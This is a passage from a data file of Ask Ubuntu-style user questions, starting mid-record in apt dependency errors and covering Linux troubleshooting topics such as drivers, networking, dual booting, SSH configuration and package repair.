libqtcore4 ( > = 4:4.6.1 ) but 4:4.8.1-0ubuntu4.4 is installed depends : libqtgui4 ( > = 4:4.6.1 ) but 4:4.6.2-0ubuntu5 is installed depends : libsdl-image1.2 ( > = 1.2.5 ) but 1.2.10-1 is installed depends : libsdl1.2debian ( > = 1.2.10-1 ) but 1.2.14-6.4ubuntu3 is installed depends : libstdc++6 ( > = 4.2.1 ) but 4.6.3-1ubuntu5 is installed depends : libtar but it is not installed depends : libvlccore2 ( > = 1.0.0~rc1 ) but it is not installed depends : zlib1g ( > = 1:1.2.3.3.dfsg ) but 1:1.2.3.4.dfsg-3ubuntu4 is installed vlc-data : vlc-nox : depends : libasound2 ( > 1.0.22 ) but 1.0.25-1ubuntu10 is installed depends : libavcodec-extra-52 ( > = 4:0.5.1-1 ) but it is not installed depends : libavformat-extra-52 ( > = 4:0.5.1-1 ) but it is not installed depends : libavutil-extra-49 ( > = 4:0.5.1-1 ) but it is not installed depends : libc6 ( > = 2.8 ) but 2.15-0ubuntu10 is installed depends : libcdio10 but it is not installed depends : libflac8 ( > = 1.2.1 ) but 1.2.1-6 is installed depends : libfontconfig1 ( > = 2.8.0 ) but 2.8.0-3ubuntu9 is installed depends : libfreetype6 ( > = 2.2.1 ) but 2.4.8-1ubuntu2 is installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is installed depends : libgcrypt11 ( > = 1.4.2 ) but 1.5.0-3 is installed depends : libgnutls26 ( > = 2.7.14-0 ) but 2.12.14-5ubuntu3 is installed depends : libgpg-error0 ( > = 1.6 ) but 1.10-2ubuntu1 is installed depends : libhal1 ( > = 0.5.8.1 ) but it is not installed depends : libmodplug0c2 ( > = 1:0.7-4.1 ) but 1:0.8.7-1build1 is installed depends : libncursesw5 ( > = 5.6+20071006-3 ) but 5.9-4 is installed depends : libogg0 ( > = 1.1.0 ) but 1.2.2~dfsg-1ubuntu1 is installed depends : libpng12-0 ( > = 1.2.13-4 ) but 1.2.46-3ubuntu4 is installed depends : libpostproc-extra-51 ( > = 4:0.5.1-1 ) but it is not installed depends : libschroedinger-1.0-0 ( > = 1.0.7 ) but 1.0.9.is.1.0.8-0ubuntu1 is installed depends : libsmbclient ( > = 3.0.24 ) but 2:3.6.3-2ubuntu2 is installed depends : libspeex1 ( > = 1.2~beta3-1 ) but 1.2~rc1-3ubuntu2 is installed depends : libstdc++6 ( > = 4.1.1 ) but 4.6.3-1ubuntu5 is installed depends : libswscale-extra-0 ( > = 4:0.5.1-1 ) but it is not installed depends : libtag1c2a ( > = 1.5 ) but 1.7-1ubuntu5 is installed depends : libudev0 ( > = 147 ) but 175-0ubuntu9 is installed depends : libupnp3 ( > = 1.4.3 ) but 1:1.6.6-4 is installed depends : libvlc2 ( > = 1.0.0~rc ) but it is not installed depends : libvlccore2 ( > = 1.0.2 ) but it is not installed depends : libvorbis0a ( > = 1.1.2 ) but 1.3.2-1ubuntu3 is installed depends : libvorbisenc2 ( > = 1.1.2 ) but 1.3.2-1ubuntu3 is installed depends : libxml2 ( > = 2.7.4 ) but 2.7.8.dfsg-5.1ubuntu4 is installed depends : zlib1g ( > = 1:1.2.0.2 ) but 1:1.2.3.4.dfsg-3ubuntu4 is installed vlc-plugin-notify : depends : vlc-nox ( = 2.0.8-0ubuntu0.12.04.1 ) but 1.0.6-1ubuntu1 is installed depends : libc6 ( > = 2.8 ) but 2.15-0ubuntu10 is installed depends : libgdk-pixbuf2.0-0 ( > = 2.22.0 ) but 2.26.1-1 is installed depends : libglib2.0-0 ( > = 2.12.0 ) but 2.32.1-0ubuntu2 is installed depends : libgtk2.0-0 ( > = 2.8.0 ) but 2.24.10-0ubuntu6 is installed vlc-plugin-pulse : depends : vlc-nox ( = 1.0.6-1ubuntu1 ) but 1.0.6-1ubuntu1 is installed depends : libc6 ( > = 2.4 ) but 2.15-0ubuntu10 is installed depends : libice6 ( > = 1:1.0.0 ) but 2:1.0.7-2build1 is installed depends : libvlccore2 ( > = 1.0.0~rc1 ) but it is not installed
387801	build gitg on 12.10 , missing webkit2gtk-3.0	i got a dependency missing while building gitg : webkit2gtk-3.0 > = 1.9.92 gee-0.8 json-glib-1.0 ) were not met : no package 'webkit2gtk-3.0 ' found problem is i can not figure out what is this package . i have libwebkitgtk-3.0-0 at 1.10.1 which should be sufficient for building gitg ( 1.9.92 required ) . which version of webkitgtk+ would correspond to this dependency ? and if there is no package , which tarball should i use to build it ? edit i found the package libwebkit2gtk-3.0-25 which is not available for 12.10 . where can i get the sources of this package to meet the minimum version of 1.9.92 ?
387803	present a virtual hba to an ubuntu xen guest so that we can assign fiber channel volumes directly to this guest	os : ubuntu 12.04 xen kernel xen tools : libvirt created a virtual hba on the physical hardware in ubuntu running an emulex hba . have done the required zoning on the switch side and assigned a test volume from storage and is visible on the host end . goal : further on , all volumes presented to this specific vhba should be presented directly to the xen guest , rather than having the volume assigned to the xen hypervisor which adds a layer inbetween the san and the ubuntu guest .
387805	download torrents with aria2c	i have installed aria2 in my ubuntu . but i am not sure of how to download the torrents with aria2c . i am very new to ubuntu . thank you .
387807	rtl8188cus module for ubuntu 13.10	i had this chipset working under 13.04 but under 13.10 it fails after a few minutes . the device is an edimax ew7811un and the rtl8188cus was reported from lsusb in 13.04 and 13.10 . realtek do n't seem to suport this beyond linux kernel 2.6.18~3.9
387808	something made all text really small - font and size settings , dpi seem ok	after booting my pc up i noticed that the fonts on the login screen on my lubuntu 13.04 are tiny . after logging in i noticed window titles being tiny and default font sizes in apps too such as skype or lxterminal - unreadable even . fontsize was ubuntu 11 as usual - changed everything to size 14 but it only changed titles and they are still smaller than they used to be . looking for others having similar problems , i found this command : xdpyinfo | grep resolution resolution : 59x60 dots per inch which seems totally ok. by the way chromium is unaffected besides the title bar and menu . what can i do ?
387809	what takes less space : debootstrap or ubuntu core ?	i have a very small disk in my netbook . so i decided to offload all development files into chroot on an external drive . what will take less space initially , debootstrap installation or ubuntu core image ?
387811	keyboard mapping wrong on almost every startup	most of the times ( but not all the times , that 's the confusing part ) when i start my laptop , the keyboard mapping will be english , although i set german as default and it actually shows german in the top right panel . it will work after i change the keyboard layout and change it back to german , but that 's annoying . my /etc/default/keyboard shows xkblayout= '' de '' does anyone have experienced a similar problem and solved it ? system : lenovo ideapad g580 , ubuntu 13.10
387812	ubuntu 13.10 shows only black screen after ubuntu logo on startup	i 've been using ubuntu 13.10 ( dual boot with windows ) for quite a while now , and on startup today , it works fine until the ubuntu logo . when it loads , the screen just turns black . however , i hear the usual startup sound when the login screen appears , but there is no login screen . i am unsure of the cause and i do not want to reinstall ubuntu because of many development changes i 've already made into it . p.s . yesterday i tried manually changing screen brightness through /etc/rc.local but brightness did not change . added a line to it and set brightness to `` 5 '' . i am unsure if this is the cause .
387814	after dual boot ubuntu 12.04.3 on ssd touch screen enabled win8 , can not boot into win8 anymore	requirement : install ubuntu 12.04.3 lts alongside win8 ( hardware is i5 processor with ssd memory with touch screen - sony vaio ultrabook ) solved : got ubuntu 12.04.3 installed successfully . shared below successful steps followed to get ubuntu 12.04.3 finally working : usb ubuntu image created i had another laptop running ubuntu 10.04 . so created 12.04.3 ubuntu image using 'startup disk creator ' from within ubuntu . usb disk image created from windows may work , but at least i could n't make it work . disabled fast boot in win8 . you can access it from win8 control panel -- > power options -- > select the check-box 'choose what the power options do ' -- > select the check box 'change settings that are currently unavailable ' at the top of the screen to enable the option to choose -- > now the setting gets unlocked . un-tick the checkbox 'turn on fast startup ' and then reboot . disable uefi secure boot inside bios setting , under 'security ' tab , disabled the uefi secure boot . regarding intel srt option somewhere in ubuntu forum , i read to disable intel srt technology option , but at least i did n't have to do any changes regarding this option . may be not required for my sony vaio ultrabook . removed all other usb devices plugged in for eg : usb mouse . in fact , i had my usb disk image plugged into usb 3.0 port . before , getting it successfully , i saw this error message often : âunable to find a medium containing a live file systemâ . wireless on ubuntu recommend not to try to turn on wireless if your wireless ssid is not shown by default . now even after , installation is complete , if you ca n't connect to wireless , then its possibly because of the acer-wmi module . i did something similar to what is mentioned in this link : [ broadcom 43225 wireless on acer laptop is disabled nothing additional done to enable touch screen . by default , working after ubuntu installed . unsolved pending issue : however , upon reboot into win8 , have some errors - `` error : invalid efi file path '' . any brief answer to solve this would be appreciated . thanks folks ! robinj
387815	13.10 laptop goes to sleep instead of shutting down when lid is closed	sometimes ( but not always ) , i use my laptop exactly like a desktop computer : i power it on with the lid closed and an external monitor and usb keyboard and mouse connected . when i later want to shut it down , the lid is still closed . it used to power down just fine with previous versions of ubuntu ( 12.04 and 12.10 for sure , 13.04 probably as well ) . ever since i installed ubuntu 13.10 , instead of powering down , my laptop now goes to sleep immediately after logging me off . the actual shutdown sequence only happens if i open the lid again , otherwise my laptop stays suspended . so i have been caught a few times with my laptop still on when i expected it to be off . not a good idea to shove a running computer inside a closed bag that i carry around ! searching around , i find a lot of people with the opposite problem ( computer shutting down when they really want to suspend ) . i also read many people advising to make changes to some `` systemd '' setting to ignore the suspend altogether , which i am wary about : why would i want to disable suspend completely for a single type of situation while i still want my laptop to suspend when i use it on battery power ? and even more since it used to work just fine with previous versions of ubuntu . do you guys have any idea what the problem might be , or how i could troubleshoot this deeper ? -- - edit : i am left with an additional question : is this problem specific to my computer , have i done something wrong to cause it ? as soon as i have time , i will try to work on this . like , does this happen from the live cd ? does it happen on a different laptop computer ? does it happen with a completely clean install on my current computer ? i will let you know what i find out .
387816	is this partitioning scheme for windows7/ubuntu fine ?	this is n't an exact copy of my previous question . i have an asus k53u laptop with windows 7 64-bit installed . i want it to dual-boot with ubuntu ( linux-secure-remix , preferably ) . i have previously used wubi on this laptop . i have an amd processor , 698gb of hard drive space and 4gb of ram . currently my partitions are arranged like this : recovery size : 25gb filesystem : ? ? ? used : ? ? ? free : ? ? ? os size : 300gb filesystem : ntfs used : 70.4gb free : 229gb data size : 373gb filesystem : ntfs used : 206gb free : 166gb total : 698gb what i think i should do to install ubuntu is this : shrink data by about 100gb create an extended partition in the space created inside this extended partition , make a 4gb swap make about 32gb / ( root ) everything else : /home is this a good scheme ? can i improve it ? will it work ? how do i put it into practice ? ( is gparted fine ? ) thank you in advance !
387818	moving from ubuntu 32 bit to 64 bit	i have a all in one panel pc - lenovo ideacenter b300 with ubuntu 13.10 ( 32 bit ) . i also have the following mount setup : /dev/sda3 on / type ext4 ( rw , errors=remount-ro ) ... . â/dev/sda7 on /home type ext4 ( rw ) ... . i just found out that my pc actally has a 64 bit architecture ( lscpu ) : cpu op-mode ( s ) : 32-bit , 64-bit and so i would like to reinstall ubuntu 64bit given that i have my /home data on another partition . my question is : would the earlier installed ( installed as ubuntu 32 bit ) `` /home '' on another partition work fine when i reinstall ubuntu 64 bit ? thanks .
387822	vlc could not read the file input/output error	i am having a cd which was copy protected . i gave to my friend , she copied the contents somehow . she said she copied .dat file . now when i insert the cd , i wo n't see the tilte of cd and it is not playing . it is giving the below error . vlc could not read the file input/output error can anyone tell me , how to make this cd normal .
387826	having issues with pwmconfig	i have lm-sensors installed , but when i run pwmconfig i get ... /usr/sbin/pwmconfig : there are no pwm-capable sensor modules installed now , i tried sudo service module-init-tools restart and i get ... . stop : unknown instance : start : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.77 '' ( uid=1000 pid=2712 comm= '' start module-init-tools `` ) interface= '' com.ubuntu.upstart0_6.job '' member= '' start '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' com.ubuntu.upstart '' ( uid=0 pid=1 comm= '' /sbin/init '' ) sensors ... . coretemp-isa-0000 adapter : isa adapter physical id 0 : +48.0°c ( high = +87.0°c , crit = +105.0°c ) core 0 : +47.0°c ( high = +87.0°c , crit = +105.0°c ) core 1 : +47.0°c ( high = +87.0°c , crit = +105.0°c ) what should i do ? i desperately need to configure my fan speed . it is so loud ! let me know if any other info is needed .
387829	how to fix audio output problems on asus x550 lc ?	i have installed ubuntu 12.04 on asus x550 lc with intel 's haswell sound card . but there is no volume output . how do i fix the problem ?
387832	how can i enable usb power after pc shutdown ?	i 'm using ubuntu 13.10 , my motherboard is : manufacturer : intel corporation product name : dp965lt version : aad41694-206 i need to have a power supply from usb even when my pc is turned off . i 've looking in the bios power options , but could not find a way to enable this feature .
387833	does ubuntu not support wireless over a local domain ?	im running a â´high end compaq with 13.10 i went offshore and the wifi connected and after 30 min disconnected and i have not been able to re connect . i have run my sudo network commands and my laptop detects my wireless etc so im confused . my rf kill lists are all unblocked . any ideas please ?
387834	keep working with bash while a program is running	i know , this is a very stupid question and the answer is out there in googleland . but i just ca n't find it . i want to start a process/program ( e.g . firefox ) in bash and keep working with the terminal . is there a way to do this ? thanks in advance , markus
387836	are drivers needed , and if so how to tell which ones ? ( levnovo b590 , 12.04lts )	using 12.04 lts with a lenovo b590 . im so new to linux , it never occurred to me i might need to actually install drivers . when i tried changing the screen res ( as seen in my question here : change resolution on lenovo b590 to 1600x900 , ubuntu 12.04lts permenently ? ) no method worked . eventually i thought maybe i need drivers , so i went to system > info and graphic driver says unknown . so i went here : http : //www.ubuntu.com/certification/hardware/201208-11524/components/ but was overwhelmed with the amount of possibilities . how do i know which ( if any ) of the drivers are needed and how do i go about installing them ? p.s additional drivers is empty
387848	problems with systemupdate	i currently have ubuntu 13.10 installed , but the problem also came up when i had 13.04 . the update via gui does n't work ! it tends to crash every time i want to do an update . if i do it from the terminal with sudo apt-get update everything works just fine , but as the computer is for someone with much less knowledge about those things it has to do the update the normal way ! it is no problem with my internet , because another computer with ubuntu does the same updates just the way it 's supposed to be ! if you have anny suggestions how to fix that or need some more information , feel free to leave me a comment or answer .
387849	not able to ssh to localhost	while setting up hadoop in my ubuntu 12.10 i am not able to ssh to localhost . hduser @ tanmoy : ~ $ ssh -vvv localhost openssh_6.0p1 debian-3ubuntu1 , openssl 1.0.1c 10 may 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to localhost [ 127.0.0.1 ] port 22. debug1 : connect to address 127.0.0.1 port 22 : connection refused ssh : connect to host localhost port 22 : connection refused can anyone help me on this ?
387851	internet is not working in the ubuntu server virtual machine ?	i have installed two vm in workstation with ubuntu server 13.04 . after configuring the static ip address in the ubuntu server , the internet is not working on any machine . i have did the following configuration : each machine have two network interface card one is vmnet8 as nat and second vmnet1 as host only . vmware networking settings : vmnet8 [ nat ] subnet ip [ 10.0.0.0 ] subnet mask [ 255.0.0.0 ] dhcp setting for vmnet8 - range 10.0.0.128 -- - 10.0.0.254 gateway address : 10.0.0.2 in natt setting . in linux vm : editing /etc/network/interfaces auto eth0 iface eth0 inet static address 10.0.0.130 netmask 255.0.0.0 gateway 10.0.0.2 restart the networking : service networking restart -- > after this internet was working , after restarting the machine , it stop working . i have tried changing may setting but nothing is working . resolv.conf -- > no setting is there after restarting networking services . how to make the setting properly in the ubuntu server ?
387853	how can i install ubuntu on pc using vmware image	i am using win 7 . i have been using vmware for a while , i have installed ubuntu in it . now is there any way , i can use this ubuntu image ( vmdk ) to install another os on my pc parallel to win7 i hope the question is clear .
387860	ca n't install xampp for linux	i 'm trying to install xampp as shown here , with the following line : su chmod 755 xampp-linux-1.8.3-installer.run ./xampp-linux-1.8.3-installer.run su goes well , but the terminal does n't run the other two lines and does n't raise any error , so i ca n't understand how to fix it . i tried to go to /opt/lampp but that directory does n't exists . how can i fix it ?
387861	create initial partition	i have 1 tb hard disk . i have already divided those into 3 partitions , leaving 73gb as unallocated for installing ubuntu in it . now when am trying to install the ubuntu , i have some questions . how should i fill the below mentioned fields : type of new partition ( primary/logical ) use as ( ext4 journaling file system/ext3/ext2/ btrfs journaling fs/ ... /fat 16,32/swap area ) mount point / , /boot , /home , /tmp , /usr , /var etc
387862	error when trying to install reader software for estonian id card	so my id software got out-of date . i wanted to update it but it failed to find any updates by itself . so now i removed the old sofware from my computer and tried to install it again and i get this in my terminal : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : estonianidcard : depends : qdigidoc but it is not going to be installed depends : qesteidutil but it is not going to be installed e : unable to correct problems , you have held broken packages . i am using a install script from here : https : //installer.id.ee/media/install-scripts/install-esteid-ubuntu.sh i change the opsys= line to raring because the source where it tries to fetch my software has raring the latest soft : https : //installer.id.ee/media/ubuntu/dists/ so.. where did i go wrong here ? output : $ apt-cache policy estonianidcard qdigidoc qesteidutil estonianidcard : installed : ( none ) candidate : 3.7.2.1310-ubuntu-12-10 version table : 3.7.2.1310-ubuntu-12-10 0 500 https : //installer.id.ee/media/ubuntu/ quantal/main i386 packages qdigidoc : installed : ( none ) candidate : 3.7.2.1198-ubuntu-12-10 version table : 3.7.2.1198-ubuntu-13-04 0 100 /var/lib/dpkg/status 3.7.2.1198-ubuntu-12-10 0 500 https : //installer.id.ee/media/ubuntu/ quantal/main i386 packages 0.4.1-0ubuntu1 0 500 http : //ee.archive.ubuntu.com/ubuntu/ saucy/universe i386 packages qesteidutil : installed : ( none ) candidate : 3.7.2.1079-ubuntu-12-10 version table : 3.7.2.1079-ubuntu-12-10 0 500 https : //installer.id.ee/media/ubuntu/ quantal/main i386 packages 0.3.1-0ubuntu2 0 500 http : //ee.archive.ubuntu.com/ubuntu/ saucy/universe i386 packages
387867	interface file error	this is my /etc/network/interfaces file # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback auto eth0 iface eth0 inet static # your static ip address 192.168.1.118 # your gateway ip gateway 192.168.1.1 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 when make /etc/init.d/networking restart the result [ ... . ] running /etc/init.d/networking restart is deprecated because it may not r [ warnble some interfaces ... ( warning ) . [ ... . ] reconfiguring network interfaces ... rtnetlink answers : file exists failed to bring up eth0 . done .
387869	installing dell-printer	how to install my printer dell photo aio 964 in ubuntu ? when i connect the printer it will be discerned , but there is no driver . i 've tried with some lexmark-drivers , but it does not work
387870	how can i make files received by bluetooth be saved in my own specified folder ?	by default , any file received through bluetooth is saved in the downloads folder . how can i create a new folder named bluetooth and have received files be saved in it ?
387871	brightness controlling keys are not working on 13.04	i have vaio e series and i have ubuntu 13.04.my default brightness keys are not working . xbacklight is also not working ( i am using the command as ( xbacklight -set 80 ) .is there any problem with the use.but xrandr is working , but i can not use them to do -inc or -dec operation . plese suggest me an idea
387874	connected but ca n't browse	i have installed ubuntu 12.04 with windows 7 in dual boot mode . i have internet connection through cable in my windows . i have set up manually the ip address , netmask and gateway in ubuntu 12.04 . then it is showing 'connected ' . but i ca n't open any webpage . so please tell me what is the problem .
387875	ubuntu freezes after installing it on virtual box . how can i fix this ?	i am able to install successfully , but once i 'm prompted to restart the machine , it freezes . i took a snapshot after it installed , and before it froze , and every time i boot the machine to this point , it still does this . how can i successfully install ubuntu on a virtual machine ?
387877	wi-fi works during the live trial , not after install	i was running windows 8 64 bit on an acer travelmate b113 with 2gb of ram . i then installed ubuntu 12.04 lts using a usb drive . everything was working fine and i was able to access the internet via wi-fi during the trial . once i accessed the installed version of ubuntu , i could still connect to my router , but accessing the internet did n't work anymore . every page i try to load in firefox immediatly says the page is n't available . i 'm now on the windows 8 part of the computer , and everything seems to work fine . how to find a solution ?
387878	how to uninstall jdk	today i installed android studio but when i opened it raised the error : 'tools.jar ' seems to be not in android studio classpath . please ensure java_home points to jdk rather than jre . i have already installed jdk from the ubuntu software center but i decide to remove it and reinstall it by command-line following these instruction . the guide that i follow for remove it is that answer , this and this . how can i uninstall it ? i know that it is installed for the output of java -version and javac -version here any information : the dpkg -- list | grep -i jdk command gives nothing the command java -version gives : the program 'java ' can be found in the following packages : * default-jre * gcj-4.6-jre-headless * gcj-4.7-jre-headless * openjdk-7-jre-headless * openjdk-6-jre-headless try : sudo apt-get install < selected package > the command javac -version gives this : `tthe program 'javac ' can be found in the following packages : * default-jdk * ecj * gcj-4.6-jdk * gcj-4.7-jdk * openjdk-7-jdk * openjdk-6-jdk try : sudo apt-get install < selected package > if i run ls /usr/lib/jvm it says that there is n't such directory . i would like to remove jdk and jre before install packages . how can i do that ?
387879	sound coming through my speakers in ubuntu	i 'm just trying to get some sort of sound coming thru my speakers . they are hooked up right and a friend who installed this system tells me my soundcard is fine ( whatever that is ) . when i try to fix the problem i 'm totally lost . i 'm afraid i was a little too impatient and might have downloaded some things and uninstalled a few plugins on mozilla without really knowing what the heck i was doing . i think that is the problem but i do n't know . i would say 99.9 % of the troubleshooting answers i 've come across read like a foreign language to me . if there is a level below beginner ... well , that 's me . please help if you can before i take a sledgehammer to this thing . yes i know , must work on my patience issues .
387884	how to install ubuntu touch emulator on 13.10 ?	i went through this site touch/emulator - ubuntu wiki but i 'm still not sure how to install ubuntu touch emulator on 13.10 . the site pointed me to : “android” package : ubuntu , for downloading a .deb package but i was n't sure which package to download . i need clear instruction on how to install the ubuntu touch emulator .
387888	sony vaio svp132a1cm stuck on boot	i have sony vaio ultrabook model svp132a1cm and it freezes when i try to boot from usb : how can i fix this issue ?
387890	allow bell for only one terminal	i am using mcabber via ssh , and using mcabber bell for sound of incoming message . in windows i used kitty it allows you to set audio file for terminal bell . in linux i still want to hear mcabber incomming messages . do you know a terminal emulator that allows you to set audio file for bell or do you know how to activate system bell but just for 1 terminal window ? please do not advise solutions like using mcabber api and sockets to transfer event to client pc . i want to use ssh bell in this solution , like it was working on windows .
387892	how to deny root ssh login + require ssh key for user ?	after reading this similar question i 'm unclear how to require ssh keys for user , while denying ssh access to root ( key or password ) . i 'll use sudo after logging in as a user if i need to be root . i know how to require ssh keys : permitrootlogin without-password i know how to disable user 'root ' from logging in : permitrootlogin no i know how to whitelist a user : allowusers user i do n't know how to put this all together ( or if it 's even necessary ? - ssh key may be good enough ) . i would normally solve an answer like this through trial and error , but i 'm afraid i 'll lock myself out of this server ...
387894	it is possible to update a live usb with persistent installed ?	so i have a live ubuntu 14.04 , installed on an usb 2.0 8 gb flash drive , i 've created 2 partition first around 1 gb for the extracted ubuntu iso and the rest is a partition labeled casper-rw for persistent and formatted as ext4.the question is , could i update it in usual way like updating ubuntu that installed in usual way ( e.g . installed in desktop or laptop hdd ) .is it possible ? p.s . : i 've tried to do that with usual live ubuntu 13.10 with persistent installed but the terminal show some error and when i reboot the live ubuntu , it wo n't start at all.just a dark screen with something white blinking : v
387898	how do i manually limit cpu usage ?	i have an old laptop prone to overheating and a good solution i found was limiting it 's cpu usage to below 50 % . on windows , i can do this by changing the power plan i am currently using , and altering the minimum cpu usage and and maximum cpu usage properties . where can i do something similar on ubuntu 12.04 lts ?
387903	how can i make a usb device ( a flash or hd ) available to ubuntu running in a virtual box ?	i have added my devices to virtual box but they do not show up inside unbuntu . sudo fdisk -l does not list them . this worked once under `` try ubuntu '' automatically and the dirves were available and readable but ever since i actually installed it they do not show up .
387904	how to get a list of installed applications without booting into ubuntu ?	i have a laptop whose hdd is dying and has become read only . i ca n't boot the system into ubuntu but i can read the ubuntu partition using a live disk . is there any way that i can get a list of installed applications ( on the ubuntu partition ) so that i can easily install them on a new hard drive ?
387905	broken packages 'libxfixes3 ' and 'libxi6 ' after update from 13.04 to 13.10	after doing a system upgrade from ubuntu 13.04 to 13.10 i am facing a problem with packages 'libxfixes3 ' and 'libxi6 ' . the system upgraded , but all my custom-installed software is gone . and also when trying to ( un ) install anything i get : the following packages have unmet dependencies : libxfixes3 : breaks : xserver-xorg-core ( < 2:1.14 ) but 2:1.13.3-0ubuntu2b1 is to be installed libxi6 : breaks : xserver-xorg-core ( < 2:1.14 ) but 2:1.13.3-0ubuntu2b1 is to be installed nvidia-current : depends : nvidia-304 but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i tried to sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... failed . the following packages have unmet dependencies : libxfixes3 : breaks : xserver-xorg-core ( < 2:1.14 ) but 2:1.13.3-0ubuntu2b1 is installed libxi6 : breaks : xserver-xorg-core ( < 2:1.14 ) but 2:1.13.3-0ubuntu2b1 is installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies then : sudo apt-get update sudo apt-get autoclean sudo apt-get clean sudo apt-get autoremove # and now tried to remove the packages but sudo dpkg -- remove -- force-remove-reinstreq libxfixes3 libxi6 dpkg : dependency problems prevent removal of libxfixes3 : amd64 : libxcursor1 : amd64 depends on libxfixes3 . nux-tools depends on libxfixes3 . gstreamer0.10-plugins-good : amd64 depends on libxfixes3 . libcogl12 : amd64 depends on libxfixes3 . vino depends on libxfixes3 . libgl1-mesa-glx : amd64 depends on libxfixes3 . libgtk-3-0 : amd64 depends on libxfixes3 . mousetweaks depends on libxfixes3 . libgtk2.0-0 : amd64 depends on libxfixes3 . gnome-settings-daemon depends on libxfixes3 ( > = 1:4.0.1 ) . unity depends on libxfixes3 ( > = 1:5.0.1-1 ) . compiz-plugins-default depends on libxfixes3 ( > = 1:4.0.1 ) . gstreamer1.0-plugins-good : amd64 depends on libxfixes3 . libclutter-1.0-0 : amd64 depends on libxfixes3 ( > = 1:4.0.1 ) . dpkg : error processing libxfixes3 : amd64 ( -- remove ) : dependency problems - not removing dpkg : dependency problems prevent removal of libxi6 : amd64 : libxklavier16 depends on libxi6 ( > = 2:1.1.2 ) . onboard depends on libxi6 ( > = 2:1.2.99.4 ) . xinput depends on libxi6 ( > = 2:1.2.99.4 ) . x11-xserver-utils depends on libxi6 . ibus depends on libxi6 ( > = 2:1.2.99.4 ) . x11-utils depends on libxi6 . libgeis1 : amd64 depends on libxi6 ( > = 2:1.5.99.2 ) . gnome-control-center depends on libxi6 ( > = 2:1.2.99.4 ) . compiz-core depends on libxi6 ( > = 2:1.2.99.4 ) . xserver-xorg-input-synaptics depends on libxi6 ( > = 2:1.2.0 ) . libgtk-3-0 : amd64 depends on libxi6 ( > = 2:1.2.99.4 ) . libqt5gui5 : amd64 depends on libxi6 ( > = 2:1.2.99.4 ) . libgtk2.0-0 : amd64 depends on libxi6 . xserver-xorg-input-wacom depends on libxi6 ( > = 2:1.2.0 ) ; however : package libxi6 : amd64 is to be removed . libqtgui4 : amd64 depends on libxi6 ( > = 2:1.2.99.4 ) . gnome-settings-daemon depends on libxi6 ( > = 2:1.2.99.4 ) . unity depends on libxi6 ( > = 2:1.7.1.901 ) . libframe6 : amd64 depends on libxi6 ( > = 2:1.5.99.2 ) . libclutter-1.0-0 : amd64 depends on libxi6 ( > = 2:1.2. dpkg : error processing libxi6 : amd64 ( -- remove ) : dependency problems - not removing errors were encountered while processing : libxfixes3 : amd64 libxi6 : amd64 i also followed removing broken packages on distro update ( 13.04 to 13.10 ) sudo ppa-purge xorg-edgers updating packages lists ppa to be removed : xorg-edgers ppa warning : could not find package list for ppa : xorg-edgers ppa any ideas what can i do next ?
387907	ubuntu will not boot after upgrade	i upgraded from 10.04 to the next version and now i see the ubuntu logo briefly and the screen goes blank . i can get to the recovery mode . how can i fix this problem without losing the existing data ?
387908	disable and enable usb	i am trying to make a little script where i can turn on and off a usb port so a little usb light connected to the port will turn off when the port is disabled and on when it 's enabled . and as i said , i want to make this as a script , and if possible i want to bind a key to the script , like : ctrl + alt + `` + '' will turn it on and ctrl + alt + `` - '' will turn it off . i am new to ubuntu and all that stuff , so please describe as much as possible ( sorry for my english.. )
387911	how do i change my logname ?	how do i change my logname ? for e.g : xyz @ ubuntu in the terminal how do i change xyz ? i have tried this command usermod -l *newname* -d /home/*newname* -m *oldname* but that gave me an error user xyz is currently used by process pid command line solutions are appreciated .
387920	ubuntu 12.04 does n't show the login screen	when i start my computer the boot process is fine , until the login screen should show up . instead of this , i only see a black screen . i must switch to console ( ctrl alt f1 ) , then kill the system graphics server by command : sudo kill -9 `pidof x` after this , the login screen shows up . i 'm not using any graphics card , just the intel hd 4000 core i7 processor . how can i fix this problem ? thanks .
387923	swap on lvm2 partition	i have lvm2 volume with two logical partitions , root and swap . my fstab looks like this : ... /dev/mapper/lvm-swap none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 and crypttab : ... cryptswap1 /dev/dm-0 /dev/urandom swap , cipher=aes-cbc-essiv : sha256 and lvdisplay : dm-0 /dev/lvm/swap dm-2 /dev/lvm/root i understand that i have encrypted swap in my lvm-swap partition , am i right ? but is n't this line in fstab unnecessary ? : /dev/mapper/lvm-swap none swap sw 0 0 it looks like my ubuntu tries to mount two swap -partitions from same lvm -partition ? can i remove the line /dev/mapper/lvm-swap none swap sw 0 0 from fstab ? my swapon -s shows : filename type size used priority /dev/mapper/cryptswap1 partition 5074940 156 -1
387927	swap fn an ctrl keys on a macbook	how to swap fn and ctrl keys in kubuntu 13.10 on a macbook pro 2013 ?
387930	ubuntu touch user manual	i am new to ubuntu touch and i 'd like to have an user manual . but i do n't find one . can you help me getting started with ubuntu touch ?
387931	change unity searcher default from `` computer and online sources '' to `` applications '' ubuntu 13.10	i have ubuntu 13.10 and i would like to change the default searcher in unity from `` computer and online sources '' to `` applications '' ( screenshots : http : //imgur.com/a/rc7q3 ) i have n't been able to find any settings regarding the default , only filter results settings . i hope somebody can help ! rasmus
387934	how can i prepend a random letter/number to the beginning of each filename ?	i 'm working on a system where i 'd like the first letter of each filename to be random - not necessarily unique , just random . i 'd like to be able to run this from a cron job . for example , i would be able to point it at a list of files like song.mp3 song1.mp3 song2.mp3 song3.mp3 song4.mp3 song5.mp3 and have it change the names of the files to something like this : a song.mp3 g song1.mp3 k song2.mp3 r song3.mp3 l song4.mp3 e song5.mp3 is there a way to do this ?
